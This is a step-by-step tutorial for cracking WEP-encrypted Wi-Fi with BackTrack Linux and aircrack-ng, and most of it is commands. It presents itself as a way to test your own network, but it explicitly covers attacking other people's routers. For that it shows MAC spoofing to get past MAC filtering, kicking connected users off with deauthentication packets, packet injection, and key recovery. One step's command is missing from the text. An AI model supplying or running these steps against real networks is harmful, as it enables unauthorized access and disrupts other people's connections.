It’s been known for a while that WEP is easily cracked. Today I will show you just how easy it is and how to test your network’s security yourself. Since I usually find that there’s generally too much explanation involved in these tutorials, I will try to keep it simple.

You Will Require :

A Wireless Router with WEP encryption
A Wireless Card Capable of Injection ( Atheros Cards are Preferred)
A Copy of BackTrack Linux
A USB Drive (2GB or larger)

Steps To Follow :

First, you need BackTrack on a USB drive. Plug your USB drive into your computer and format it with FAT32.

Now, Download and run UNetbootin

Select “Backtrack ISO Image” and point Unetbootin to the location of your BackTrack ISO file, then make sure the proper drive letter to your USB drive is selected.

Click OK and wait for UNetbootin to finish copying files to the USB Key.

When complete, you can click “Reboot Now” or “Exit” to finish.

Booting to Backtrack

Restart your computer with the USB drive in and press your computer’s boot selection button. Probably either F2 or F12.

Once you’re at the prompt, type:


This will place you into the X Windows environment and make it easier to run multiple shell windows.

Open a shell by clicking the icon on the taskbar. Don’t worry if your window doesn’t look exactly like mine, you’ll be fine!

Now let’s check and see if you have a card compatible with Aircrack-ng.

At the prompt type:

lspci | grep Wireless*

This will read all of the hardware on your computer, but only return those Wireless in the name.

Your results should look something like this :

Now go to This Link and check if your Wireless Network Adapter supports airodump and aireplay. Also check on this site –> which linux driver is for your adapter.

If you have iwl3945 you must first enable “Monitor Mode” on the wifi card. To do this execute following commands :

modprobe -r iwl3945
modprobe ipwraw

This tutorial is assuming you have an Atheros card. If you have a different card you’ll have to do more research on your part ragarding which driver you need to install and how to enable “Monitor Mode” on your wificard.

Cracking The WEP

I will try to explain as much as I can to get the job done. You can google if you want more detailed information regarding the commands used here :

Run the iwconfig command at the prompt to get your wireless card’s name.

In this case, mine is wlan0.

Next run airmon-ng to create a monitor interface for your wireless card to listen on.

Now it’s time to gather some information that we’ll need later. Run airodump-ng on the interface to see a list of wireless routers in our range.

airodump-ng wlan0

Find the router with the WEP you want to crack. In this tutorial we’ll be going after the first one on the list —> TEST.

Make sure to either write down or save into a text document the BSSID & CH(channel) of router – TEST and make sure that the router is using WEP as it’s ENC. You will need these.

Using the info you just gathered, run the following command to capture data on your target.

airodump-ng -c (channel) –bssid (bssid) (interface)

in my case:

airodump-ng -c 1 –bssid 00:15:6D:E8:A8:78 wlan0

Now we’re gathering all of the information we need that is sent to this router.

If you want to crack WEP of some router other than the one on your network then look at the above window carefully and see if you find something like this :

BSSID                          STATION              PWR      Rate     Lost      Packets        Probes

00:15:6D:E8:A8:78       00:11:22:33:44:55    -57          24-25     0           136

Here BSSID is the MAC address of the router we want to hack and STATION is the MAC address of any computer on that network which is currently connected to this BSSID. Now, if this router has enabled MAC filtering than only the computer on it’s network can connect to it. So, what we have to do is : Note down the MAC address of any of the STATION and wait until the computer with that STATION goes offline or disapper from this list. Now, we change our MAC address to that of the STATION and connect to the router, making it think that a computer from his own network is trying to conect. To do this, type following command :

macchanger -m (MAC of STATION) interface

In my case :

macchanger -m 00:11:22:33:44:55 wlan0

Now, your mac is changed. Suppose now my MAC becomes : 00:15:AF:C9:B6:B2

Let’s see if we can connect to the router by using this command :

aireplay-ng -1 0 -a (bssid) -h (your mac) -e (essid) (interface)

Mine would be:

aireplay-ng -1 0 -a 00:15:6D:E8:A8:78 -h 00:15:AF:C9:B6:B2 -e TEST wlan0

Success! We can connect and hopefully inject packets.

Now let’s try to generate traffic to your router so we can have some good packets to capture. Use the command :

aireplay-ng -3 -b (bssid) -h (your mac) (interface)

Mine would be :

aireplay-ng -3 -b 00:15:6D:E8:A8:78 -h 00:15:AF:C9:B6:B2 wlan0

If you’re lucky, that window will start going crazy with packet captures in a few minutes. But most of us will need to wait for someone to connect to the router. You can check in the other shell we left open, if anyone is conected to the router or not. We need a successful connection to replay back to the router to capture the data needed to crack the WEP.

If you notice that someone else is connected to the router, you can use the following command to kick them off, thus forcing a reconnect and giving you the connection info you need to replay back to the router.

Use the following command to attempt to disconnect a client from the router:

aireplay-ng -0 1 –c (client mac)  -h (your mac) –e (essid) (interface)

Mine :

aireplay-ng -0 1 -c 00:17:C4:50:56:C9 -h 00:15:AF:C9:B6:B2 -e TEST wlan0

Now, the client should reconnect and give us the data we need to replay.

Now we’re injecting packets at 499-500 packets per second. Let’s look back at our airodump-ng screen.

We’re looking for about 25,000 in the #Data column before we start the actual cracking process. Depending on the power of your network adapter and the router combined, this could take some time.

Now that you have atleast 25,000 good captures, let’s crack that WEP !!!

Type this at the prompt:

aircrack-ng -b (bssid) (name of .cap file)

Here “name of .cap file” will be the name of the file that will save all the captured packets. You can get it by carefully examining the data written on your shell. Also, this file is created on your desktop. You van get it’s name from there.

Mine would be :

aircrack-ng -b 00:15:6D:E8:A8:78 capturefile-01.cap

Depending on the speed of your computer and the complexity of the key, this could take a while.

It might actually take a while !!!

That’s it, you’re done. Write down the key, restarts your computer, and enter the WEP key when attempting to connect to the network.